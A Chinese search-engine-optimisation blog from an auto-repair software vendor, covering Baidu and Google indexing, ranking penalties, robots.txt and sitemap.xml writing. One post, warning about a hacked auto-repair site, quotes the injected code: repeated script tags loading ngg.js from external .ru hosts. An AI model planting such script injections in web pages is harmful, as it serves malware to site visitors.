百度先生:你在看谁家的黄脸婆?(关于百度收录策略)

google应用及研究, 百度搜索引擎研究, 社会百态 No Comments »

来自:汽车维修管理软件博客,原文: 看不懂的百度收录策略

近半年的收录策略的调整,包括百度和谷歌都有很大改变。如果你是站长的话肯定对最近这些调整也有体会。

首先,百度收录快、收录多,谷歌收录慢、收录少,这种局面完全是调过来了。百度近最近半年对新站的收录都比较慢,而且页面不容易收录,对于质量不太高的文章K得很快,整站K掉是常有的事情。经常逛一些站长有关的论坛就知道。

其次,因为百度与谷歌技术上的差距,百度对一些站点的页面无法收录到。所以有很多站的整站收录数百度的要比谷歌少。谷歌开始更看重时效性,对于新的文章以最快的速度收录,这一点改变主要是针对博客,并且是普通的博客。比如我在汽车修理厂管理博客上发表文章,只需要几分钟就可以收录。这一点对百度来说,几乎是不可能完成的任务。当然,对于大站,百度和谷歌都是比较实时的收录,因为这些站有常驻的搜索蜘蛛。

据说,百度因为硬件设备的配置储备不够,面对目前互联网信息的爆发性质的增长完全准备不足,所以收录容量有限,百度面对这个问题不得收紧收录策略,对一些权威性不够,站点质量不高,文章质量也不高的站点不收录,同时也在大量的K站。

在文章做百度竞价可以改变百度收录问题吗?中说到:
话说到百度空间的收录问题,对于其它门户博客的收录都不断的增长。百度先生不知道在偷窥谁家的黄脸婆,总觉得别家的长得比自家的好看,质量比自家黄脸婆 好。所以百度空的收录一直都是下降,一年前就不止收录300万了,现在还是200万左右浮动。一年的时间,一千万的百度空间用户,这一年来难道什么都没写 吗?如此鄙视百度空间的用户!百度先生是不是该回家好好反省一下了??

百度为什么要喜欢别人家的黄脸婆?这无法看懂。关于黄脸婆的故事请看这里:你在看谁家的黄脸婆

看看目前百度对于百度空间都在收录什么吧,site:hi.baidu.com/一下,结果让我大跌眼界!第一篇文章是空的,第二篇也是“主 页博客相册|个人档案 |好友 文章列表 暂无文章。”如此的内容,第三、第四、第五……一直第47页,也就是说前面470篇文章都是无内容的页面。百度收的垃圾都放在前面去了。接下来的 47页里面那些文章打开来也是寥寥几字的小朋友写的。如果从空间的名称来看,前面47页绝大部分都是小朋友的空间。

百度空间中“暂无文章”是什么意思呢?原因有两个:一是之前写过文章,后来自己删除了,或者作者把它隐藏了。二是作者写了百度认为不符合百度空间协议的文章,百度把它删除或者屏蔽了。从百度快照来看,在抓取时就已经不存在了。

百度空间内“暂无文章”的例子当然不止那几百篇,那几百篇只是排在前面的活生生的例子。从第一个原因来说,这些小朋友会不约而同的把它删除或者隐藏了吗?完全不合理的推断。第二个原因:作者都是小朋友,不可能写出有违反百度空间协议明令禁止的文章。是不是还有第三种原因,百度认为他们是脑残一代写出来都是脑残文章,把它们统统删除掉,免得影响和谐。关于什么是脑残 非主流点这里。

“暂无文章”的问题扯远了,但是百度为什么要收录这些不符合百度收录指面的垃圾页面?实在是看不懂!

浏览汽车维护与修理网请用最安全的浏览器Firefox!

google应用及研究 No Comments »

汽车维护与修理网相信很汽修行业的人士都知道,这个网站有大量的汽车维修行业最新资讯,大量免费的汽车维修技术资料,还有汇聚大量的汽修专业人员的维修论坛。但是这样一个行业性网站的安全性却是很令人担忧。特别是对汽修行业的人士来说,浏览汽车维护与修理网的某些页面将带来安全性问题,我们上网除了装好防火墙、杀毒软件外,还要用一个安全又速度快的浏览器,最好的选择是Firefox!关于Firefox的优点请看此文:速度快,防病毒,就要用火狐浏览器!

为什么要提出这个建议,请看来自汽车维修管理软件博客的文章:

接前文:汽车维护与修理网被谷歌惩罚,结果很严重!
发现汽车维护与修理网被谷歌惩罚之后,在我的积极建议之下,汽车维护与修理网做了商业广告部份的链接的标注。关于通过买卖链接来传递PageRank的解决方法比较简单, 解决方法:为了遵循谷歌的质量准则,买卖链接应通过”rel=nofollow”或其他技术来屏蔽,网站经过调整之后再谷歌申请审核,方法请看:使用网站管理员工具申请重新审核

不知道汽车维护与修理网管理员有没有作申请重新审核之类的工作,但是我在我的谷歌管理员工具中作了一次解除连带性惩罚的申请,内容中提到了www.autorepair.com.cn的改进之处,间接的帮了汽车维护与修理网一把。今天site:www.autorepair.com.cn的结果也为961了。汽车维护与修理网终于解放出来了。但是查询结果中还有这此安全警告:

汽车维护与修理网

该网站可能含有恶意软件,有可能会危害您的电脑。
汽车轮胎使用隐患令人担忧. http:/www.autorepair.com.cn&nbsp2008-7-28 11:01:43 张煦. 2008年“关注轮胎,关注行车安全”全国轮胎安全检测活动,刚刚公布了北京站的
www.autorepair.com.cn/jianxiu/showtext.asp?cartextid=683 – 6小时前

网站被挂上恶意软件之类的木马、病毒等,这就很严重了。被怀疑参与了涉嫌买卖链接的交易,还有木马,网站的信誉度无法让谷歌接受,惩罚在所难免。相比百度,谷歌在维护用户的安全性问题方面,做得百度强多了。

查看了一些页面,攻击汽车维护与修理网,并种木马的人超级恶心!看下面的代码:
<script src=http://www.b4so.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.oics.ru/ngg.js></script><script src=http://www.oics.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.b4so.ru/ngg.js></script><script src=http://www.oics.ru/ngg.js></script><script src=http://www.oics.ru/ngg.js></script><script src=http://www.oics.ru/ngg.js></script><script src=http://www.oics.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script>

用IE打开这个网站的话,中招后,这台电脑还能用吗?差不多就死翘翘了。
用Firefox的话,上面的危险代码是不能执行的。为了你的电脑安全,在浏览汽车维护与修理网请用最安全的浏览器Firefox。

汽车维修管理软件博客中更多Firefox的信息请点此
有关汽车维护与修理网的更多信息请点此
免费汽车维修资料(汽车维护与修理杂志2007第9期内容介绍)免费下载。

原文:汽车维护与修理网与恶意软件有染,浏览汽车维护与修理网请用最安全的浏览器Firefox!

为什么我们的网站排名会降低?该如何处理?

google应用及研究, 百度搜索引擎研究 1 Comment »

近期发现很多在谷歌排名前列的关键字没有我的网站(http://www.whsjsoft.com)。比如汽修软件,这原本坐稳了第一名的关键字,只剩下两个博客。再比如:首佳汽修软件,这个关键字几乎是没有竞争对手的,因为只有我们提供这样的内容。这个关键字有很多个友情链接指向主页,排第一无可厚非的,但是现在也不见了排名?只有一个解释-网站被降权了!

Google黑板报文章:我的谷歌排名哪里去了?,文中重要摘要及我们的处理办法如下:

1、谷歌对某一网站惩罚的最常见的原因就是网站的网络作弊。在谷歌网站管理员指南 中,谷歌指出了如何设计网站,网站的内容应包含哪些,网站管理员必须了解哪些技术,并给出了网站的质量指南。任何违反网站质量指南的网站都被称为作弊网 站,并可能受到惩罚。在质量指南中,下列行为被认为是作弊:隐藏文本或隐藏链接;隐藏真实内容或欺骗性重定向;向谷歌发送自动查询;使用无关用语加载网 页;创建包含大量重复内容的多个网页、子域或域;针对搜索引擎制作的”桥页”,联属计划;制作会安装病毒、特洛伊木马或其他有害软件的网页。这些行为的共 性是,他们都是为搜索引擎而作,而不是为访问网站的用户而作。

被降权首先想到的是网站有没有作弊?是否符合谷歌网站管理员指南 中指导的建站要求?最近我们站都没有作过改动,主动作弊这种情况完全可以排除。因为在谷歌中排名一直很好,没有再作弊的必要。另外,关于重复内容,因为百度对我站(http://www.whsjsoft.com)的新闻内容页一直不收录,新闻页面是由带有两个参数的ASP页面生成的内容;后来为增加百度的收录特地加入网站导航页面,并将新闻内容转成静态的页面;但是谷歌等搜索引擎是可以收录的,所以等于是重复了一次内容。我们可以做的是:可针对谷歌设置robots.txt内容如下:

User-agent: googlebot
Disallow: /sitemap/index/
Disallow: /sitemap/index5/
Disallow: /sitemap/index4/
Disallow: /sitemap/index2/
Disallow: /sitemap/index1/

关于重复内容,还有一点也是很可疑的影响网站质量及可读性的;就是网站版权部分区域原先是每一个页面都是相同的,都从一个foot脚本中导入的。相同的版权说明的内容,在一定程度上也会造成网站内容的重复。现在将它改成栏目的导航功能,这一点重复就无关紧要了。

PR的传递和页面的重要程度的处理,也会影响网站排名,几乎每一个页都有相同的友情链接的内容,等于把页面本身的PR分散的传递到其它网站上,这似乎没有必要。

2、网络作弊的另一种行为是无效链接的利用。一些网站通过买卖链接,或利用其他网站的自助链接功能得到链接,或者干脆使用垃圾链接软件来得到完全无效的链接。这些短视行为影响了谷歌排名算法的正常运行。谷歌不得不调整算法对这些作弊的网站降权。在要求重新收录或找回排名前,用户必须移去违反网络管理员指南的内容,或检查自己的网站安全性能以保证没有被黑。对违反当地法律的内容也必须移去。被降权的网站必须撤掉不合理的链接。

昨日我作全站的死链接检查工作,发现好几个无效的对外链接,几百个可能是垃圾网站的引用通告,及几十个可通链接垃圾网站的留言。这些可能是我的网站排名会降低,并被降权的罪魁祸首!禁止接收引用通告,禁示游客发表留言,是治根又治本的办法。所以我们必须做的是把这些垃圾链接全部清除到一干二净,还必须做的是:汽车维修管理博客将禁止引用通告及游客留言功能

3、检测网站死链接,提高网站质量,另一种更精确的方法是利用谷歌的网站管理员工具注册并查询你的网站的信息。在谷歌网站管理员工具中会定期报告谷歌蜘蛛人在我们网站上抓取过程中发现的无效链接。有些死链接可以分析原网页代码找到错误把它修复。虽然有些死链接可能无法解释,无法修复;但是我们可以在robots.txt中增加禁止索引的规则。比如:

Disallow: /blog/commentedit.asp
Disallow: /blog/go.asp
Disallow: /Bs_UserReg.asp
Disallow: /javascript:VoteForm.submit()

这些不知来源的死链接,我们还是可以控制不抓取的。

4、网站的安全性。这不光是网站自身的安全性,还有对你的客户的安全性,我们的网站对访客是不是负责任的?

看此文:本网站被值入病毒代码,现已经恢复正常

前些天网站被恶意的值入病毒代码、指向恶意网站。这都是很严重的安全性问题。还好花费了一个小时就把恶意代码清除了,但是如果这个时候谷歌的蜘蛛人正好在抓取,那后果就是惩罚、降权处理。

5、其它建议如谷歌网站管理员中文博客:给网站管理员的建议:创建可利用的、可抓取的网站

做好了这些工作,希望谷歌能解除惩罚,并恢复我的排名。

关于首嘉软件,首嘉汽车配件软件

google应用及研究, 其它搜索引擎相关 7 Comments »

无意中百度一下”首佳汽车维修软件“,相关搜索中还有出来一个”首嘉汽车配件软件“。当然这个“首嘉汽车配件软件”是不会有准确结果的,因为这个是我们的客户的错误拼写成的关键字。

有趣的是,还不止一个客户有错误拼写,百度一下“首佳软件”还有一个相关搜索是“首嘉软件”。结果“首嘉软件”一下,出来的是百度的友好提示:您要找的是不是: 首佳软件这个是搜索引擎的纠错功能。这个功能不错,谷歌和百度都有,用于加强用户体验。在用户拼写错误,或者原本就不清楚,或者不知道怎么拼写想要的关键字时,这个功能可以满足客户想要的结果。我们就当搜索引擎也是个活字典吧。

另外说明下,当搜索量不够时,因为分词技术的原因,首佳不是一个词组,所以现在谷歌中不会显示您要找的是不是: 首佳软件?比如谷歌:百毒公司,会提示你是不是要找百度公司?“百毒公司视频”事件相关的文章还是有一定的信息量的,谷歌是帮忙还是意有所指呢?

Google细节创新:企业名周边搜索结果精确化

IT技术及应用, google应用及研究 1 Comment »

Google的技术细节创新永不止步,是科技、技术型企业学习的楷模。最近我发现Google可以根据外部链接的文字描述来将搜索结果精确化,比如Google搜索企业名称相关的周边关键词(或者叫外延关键词吧。)出现的搜索结果均以网站主页的meta信息来显示网页的标题,而不是显示网页真正的标题。

网站主页的meta信息包括“Author”、“Copyright”、“Description”中所描述的信息来确定某一个企业网站的企业名称,或者是品牌名称。以武汉首佳科技有限公司为例,举例说明相关的周边关键词搜索结果:

1、Google一下:武汉首佳科技有限公司

武汉首佳科技有限公司

www.whsjsoft.com
湖北省武汉市江汉区姑嫂树路8号, 新华家园A3-1102
027-65606082
详情 »

武汉首佳科技有限公司

武汉首佳科技有限公司,免费的汽车维修资料库软件|汽车维修软件|汽修汽配管理软件|汽车修理厂软件|汽车维修管理系统|汽修软件|汽配软件|汽车美容店管理软件|汽车4S店
www.whsjsoft.com/ – 45k – 网页快照类似网页

武汉首佳科技有限公司

武汉首佳科技有限公司简介、联系方式及我司供应求购信息总览/公司信息:武汉首佳科技

有限公司供应商/
www.17b2b.com/c168-45822.html

 

武汉首佳科技有限公司登陆了Google地图搜索_汽车维修管理软件资讯博客

今天用Google搜索我们公司名“武汉首佳科技有限公司”,发现Google地图搜索终于把我们公司“武汉首佳科技有限公司”登陆了。搜索结果如下:
http://qixiuqipei.yo2.cn/14273

 

以上结果中,第一名是谷歌地图搜索的精确结果,公司信息、地理位置等由企业主动提供给谷歌,并由谷歌寄来信件给企业,企业再回信给谷歌以确定信息属实。谷歌的用户在搜索这个企业名称时将谷歌地图的信息定为第一位,以保护企业利益。而结果也是谷歌的用户最需要的,包括地址、联系电话、官方网站等信息。这上面的第四个新闻所描述的作用就在于谷歌地图搜索的精确结果。

 

第二名是企业官方网站,搜索结果是企业名称作为网页标题,而不是网页真正的标题。在搜索与企业名称无关的关键字时,比如搜索“汽车维修软件” 的结果:

 

汽车修理厂管理软件|汽车维修软件|汽修软件|汽修汽配软件|汽车美容软件

专业的汽车行业管理软件开发商,主要产品:汽修汽配管理软件、汽车美容软件、汽车4S

店软件、客户管理软件等。网站提供最新的汽车维修软件咨讯、汽车相关行业咨讯、免费
www.whsjsoft.com/ – 45k

 

显然,这个细节的创新对搜索质量的提高是很明显的。像百度等搜索引擎搜索相应关键字时是显示上面的这个结果,而这个结果与第一个和第二个结果相比,谷歌提供的结果更让用户们易于分辩,且信息实用。 这第一个地图搜索的结果和第二个由外部链接和META信息确认企业网站的结果,等于给搜索质量上了双重保险。

 

企业名周边关键字包括企业简称、企业相关的品牌简称,比如武汉首佳科技有限公司的简称有:首佳科技首佳软件武汉首佳等,这样的周边关键字搜索结果都是如上面所说的第二个结果一样,网页标题显示企业全名。而搜索企业的某一个产品名称时,是按正常网页抓取的信息来显示结果的,比如“首佳汽修软件”结果如下:

 

汽车修理厂管理软件|汽车维修软件|汽修软件|汽修汽配软件|汽车美容软件

武汉首佳科技有限公司,免费的汽车维修资料库软件|汽车维修软件|汽修汽配管理 首佳汽车美容管理软件包括汽修美容软件、汽车快修美容软件两个系列共6个版本的产品。
www.whsjsoft.com/

 

当然,如果你的企业网站权重不够时,又有别的高权重的网站发布了你企业产品信息的页面时,你的企业网站就排不到第一名了。这上面最后两个搜索结果,标题相同,但网页描述不同,完全是因为要满足关键字的相关度。

 

最后,希望百度等搜索引擎也能不断的改进自己的技术,也祝愿google不断的创新细节,带给用户更好的搜索体验。

汽车修理厂管理与汽车维修管理软件博客PR升级

WordPress及维护日志, google应用及研究, 首佳新闻 4 Comments »

前两天打开博客,发现汽车修理厂管理与汽车维修管理软件博客的PR升级了,由0升级到2。这是一个正常的表现,有持续的更新、有原创文章、一定数量的外部链接;有这三个条件的作为基础,谷歌不给我这个博客升级PR都难了。

PR值又是什么?Page Rank的中文为页面等级,缩写为PR 。Page Rank是Google推出的网页等级,通常被称为PR值,从0到10一共11个级别,级别越高则证明该网页越重要,一般情况下PR高的网页会有更大的机会排在Google搜索的前列。有兴趣可以看PR的其它解释

前段时间谷歌的网站管理员工具统计显示,这个博客的外部链接莫名其妙的消失的一个不剩了 。昨天去谷歌网站管理员工具查看时, 也恢复了,现在增加到869个。这869个外部链接当中,除了正常的链接,还包括一些博客设置了nofollow标签的评论留下的链接,还包括百度空间用SCRIPT生成的友情链接(在浏览器客户端生成的链接)。如此看来,大量的留下带自己博客地址的评论,不管是不是垃圾评论,都会被计算为外部链接,不过质量和作用肯定不能与正常链接相比了。

另外,YO2升级后带来的一系列问题大部分都得到解决。例如:1、sitemap.xml的格化不再被谷歌认为不可识别的。2、根目录下的robots.txt文件经常返回200的成功状态,不再是robots.txt无法访问。3、网站已顺利的得到谷歌网站管理员工具的验证,也不再是告诉你因为访问超时而无法验证。4、提交的sitemap文件,很不错的结果哦,收录比例很高。结果如下:

Sitemap 中的总网址数 92
Sitemap 中已编入索引的网址 91

近期的访问速度也不错了,希望YO2的服务器能一如既往的稳定、好用。

相关文章:

谷歌:外部链接清零?PR降为0?

谷歌:外部链接清零?PR降为0?

google应用及研究 4 Comments »

今天看博客PR为降为0了,以为正在更新当中呢,因为我看到有些网站的PR已经更新了,有升有降的。没想到汽车修理厂管理与汽车维修管理软件博客会不幸中的一个。

查看了谷歌网站管理员工具后台,谷歌统计到的外部链接由805个清到只有2个了,link:soft.whsjsoft.com也没有结果了。但是实际上805个当中的外部链接并没有完全不存在了,可能少了一小部分,但也有新增加的。同样搜狗的评级也在稳步中上升,目前是28,结果:http://www.sogou.com/web?query=link%3Asoft.whsjsoft.com&num=10&w=01020101

yahoo的站点管理器也是反映了真实链接数:http://sitemap.cn.yahoo.com/search?p=http%3A%2F%2Fsoft.whsjsoft.com&fr=seo-rd-se&bwm=i

谷歌清除这个博客的外部链接有点想不通了,只是最近YO2的服务器在升级,无法访问不稳定的情况时有发生。这对降PR来说是个有点合理的解释,像YO2的主页的开发博客都降了,主页由5降成4,开发博客降成0了。但是YO2升级只是花几天时间而已。再一个可能的原因是升级后sitemap始终无法正常被谷歌识别。在前一个版本时robots.txt文件经常无法访问。这个问题多半是yo2服务器的问题。

再假以时日吧,相信谷歌能给汽车修理厂管理与汽车维修管理软件博客恢复正常。

在百度、谷歌中如何查询新浪博客的收录数?

google应用及研究, 百度搜索引擎研究 3 Comments »

新浪博客的结构跟大部分博客都不同,文章所在页面不在用户名的目录下,也没有二级域名,所以也没有在二级域名下。

在百度中如何查询新浪博客的收录数?

比如我在新浪博客里的一个镜向博客http://blog.sina.com.cn/weixiuruanjian,不能按常规查询办法site:blog.sina.com.cn/weixiuruanjian,这个命令只能返回三四条记录。domain:blog.sina.com.cn/weixiuruanjian的结果也包括部分收录数,但也是不准确的。看看新浪博客文章的结构就知道了,所有博客的文章虽然不在用户名的目录下,但是都在blog.sina.com.cn域名内,文章的名称是随机产生的。这样的结构并不利于搜索引擎优化,因为不同的博客的主题内容是不同的,全部集中在一个目录下,变得主题不集中,权重高不到哪里去。如果要取得好的排名,新浪博客绝对不是好选择。

看看百度的高级搜索语法:http://www.baidu.com/search/page_feature.html#0904 支持“把搜索范围限定在特定站点中——site”、“精确匹配——双引号和书名号”,有这两个语法的支持就好办了,只要把他们组合成一个命令就行了。新浪博客的文章的标题是带博客名称的,所以用双引号括起博客名称就可以查出相关的收录情况,前提是你的博客名称是唯一的,或接近唯一了。查询命令:site:blog.sina.com.cn “汽车维修博客”,返回实际收录是17篇。或者用这个语法:把搜索范围限定在网页标题中——intitle,命令为site:blog.sina.com.cn intitle:汽车维修博客,返回实际收录结果20个。这里面包括一些新浪博客群里面的文章,减掉一些,比较接近最实际的收录数了。

在谷歌中如何查询新浪博客的收录数?

在谷歌中也一样支持双引号的精确匹配查询:site:blog.sina.com.cn “汽车维修博客”,返回结果153个。结果中包括路径名包含reader、print、blog的三种,不知道新浪博客搞这么多不同的页面名称是出于何目的?谷歌的收录要求要低一些,但是结果差这么多,是技术原因吗?

另外site:blog.sina.com.cn “weixiuruanjian”返回60个结果,这倒很像是真正的收录结果。因为汽车维修博客可能还包括其它博客文章中出现的汉字。

google应用:如何写sitemap.xml文件?

google应用及研究 7 Comments »

看到一些网友搜索”如何写sitemap文件”进入本站,有些奇怪,本之前并未写过这样的文章,竟然在百度和谷歌中排名第一,搜索结果是这篇文章:sitemap和robots的关系,robots如何写?

为了不负众望吧,本文解释一些与sitemap相关的知识与大家分享。

什么是 Sitemap 文件?为什么网站需要它?

通过Sitemap 文件,您可以告诉谷歌关于您网站上的所有网页;另外,还可以选择是否告诉谷歌关于这些网页的信息,如哪些网页最重要以及更改频率。Sitemap 有助于加速网页的查找,这也是抓取网页和编制索引重要的第一步,但还有其他很多因素会影响抓取/编制索引过程。Sitemap 可让您告诉google关于您网页的信息(您认为哪些网页最重要,这些网页的更改频率如何)。

Sitemap是对原来robots.txt的扩展,它使用XML格式来记录整个网站的信息并供Google读取,使搜索引擎能更快更全面的收录网站的内容。Sitemap的作用就好像为网站提供了整站的RSS,而Google就是这些RSS的订阅者,只要网站有更新就会自动通知Google。这样一来,搜索引擎的收录由被动的Pull变成了主动的Push。

更多sitemap的帮助信息请参考:http://www.google.com/support/webmasters/bin/topic.py?topic=8476

另外谷歌希望网站所有者只创建一个 Sitemaps 文件供所有搜索引擎使用。这与很多有关Sitemaps 文件最好只包含100个以内的网址的说法并不相符,所以我们尽可相信谷歌官方的说法:您可以提供多个 Sitemap 文件,但每个 Sitemap 文件包含的网址不得超过 50,000 个,并且未压缩时不能大于 10MB。Sitemap 索引文件最多可以列出 1,000 个 Sitemap。

sitemap文件可以通过第三方程序自动生成,地图生成工具页面: http://www.sitemapspal.com/

1、在这个网站可以自动生成sitemap文件,进入这个网站后找到如下图中的黄色选框,输入要添加Google Sitemap的网站地址,例如: www.whsjsoft.com(前面“http://”默认显示,不要删掉。),然后回车。

2、回车后,第一屏页面下方的文本框中,会生成一段代码。用鼠标全部选中文本框中的代码,打开记事本等工具,复制上去。然后,把这个文件保存为:Sitemap.xml.

3、把保存的Sitemap.xml文件上传到你的站点的根目录下。

4、在谷歌网站管理员工具中提交sitemap文件。

当然,除了用工具生成sitemap.xml文件,也可以自己动手写,以弥补工具可能产生的错误。范例:本博客的sitemap为http://www.xiuli123.com/sitemap.xml
手动写sitemap文件需要尊守如下规则:

Sitemaps 协议格式由 XML 标记组成。Sitemaps 的所有数据数值应为实体转义过的。文件本身应为 UTF-8 编码的。

以下是只包含一个网址并使用所有可选标记的 Sitemaps 示例。可选标记为斜体。简单范例:

<?xml version="1.0" encoding="UTF-8"?>
  < urlset xmlns="http://www.google.com/schemas/sitemap/0.84">
   < url>
    < loc>http://www.example.com/</loc>
    < lastmod>2005-01-01</lastmod>
    < changefreq>monthly</changefreq>
    < priority>0.8</priority>
   </url>
  </urlset>

Sitemaps 应:

  • <urlset> 开始标记开始,以 </urlset> 结束标记结束。
  • 每个网址包含一个作为父标记的 <url> 条目。
  • 每一个 <url> 父标记包括一个 <loc> 子标记条目。

请参考相关信息:XML 标记定义Sitemaps 索引 XML 标记定义

要验证手工写的sitemap.xml文件是否正确,可以用个简单的方法,用IE打开它,如果不报错,基本上正确了,然后才可以上传到网站根目录下并提交给谷歌。注意:sitemap.xml文件中一定不能包含纯汉字,否则一定会报错。

相关文章:Google网站管理员工具为什么要重复验证?

来自:首佳管理软件博客,转载请注明!

首佳汽车修理厂管理软件广泛应用于全国各地的汽修厂,汽车4S店,维修站,汽车美容连锁店等企业.
论坛文章RSS 评论RSS 登录